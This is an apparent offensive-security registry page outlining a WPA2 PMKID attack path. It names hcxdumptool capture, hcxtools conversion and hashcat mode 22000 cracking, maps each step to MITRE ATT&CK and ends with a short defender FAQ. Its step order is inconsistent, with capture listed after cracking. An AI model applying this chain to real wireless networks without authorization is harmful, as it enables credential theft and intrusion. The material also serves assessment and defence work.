Skip to content
attack.paths
Connexion
← RegistryDossier · 5 steps · 4 edges

PMKID attack → offline crack with no client interaction

WPA2 PMKID can be extracted from a single association attempt with the AP — no client needed. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak.

Filed by AD Knowledge Base
§ Kill-chainDrag · zoom · scroll

§ Context

Assumed environment: target WPA2 AP responds with RSN PMKID (most early-2018+ APs). No connected clients are required, useful for late-night assessments.

§ Steps

  1. 01
    Connect to WLANInitial Access
    T1078Valid Accounts
  2. 02
    hcxtools → hashcat .22000 formatExecution
    T1059Command and Scripting Interpreter
  3. 03
    hashcat -m 22000 wordlist + rulesCredential Access
    T1110Brute Force
  4. 04
    Continue internal foothold chainDiscovery
    N-NMAP-INTERNALInternal Nmap Sweep
  5. 05
    hcxdumptool — capture PMKIDsCredential Access
    WIFI-PMKIDWPA2 PMKID Attack

§ References

§ Frequently asked

What is the "PMKID attack → offline crack with no client interaction" attack path?
WPA2 PMKID can be extracted from a single association attempt with the AP — no client needed. hcxdumptool + hashcat -m 22000 yields the PSK if it's weak. It chains 5 steps drawn from real-world offensive-security techniques.
What starting position does this attack require?
The first step is Connect to WLAN (T1078) — a initial access primitive. Assumed environment: target WPA2 AP responds with RSN PMKID (most early-2018+ APs).
What is the final impact of this kill-chain?
The final step lands on hcxdumptool — capture PMKIDs (WIFI-PMKID), which falls under Credential Access. From here, an operator typically pivots into post-exploitation or maintains persistence.
How can defenders detect or prevent this attack?
Detection and prevention vary per step. Refer to each linked MITRE ATT&CK entry under "References" — every technique on that page lists defensive controls, detection telemetry, and known threat-actor usage.

§ Related dossiers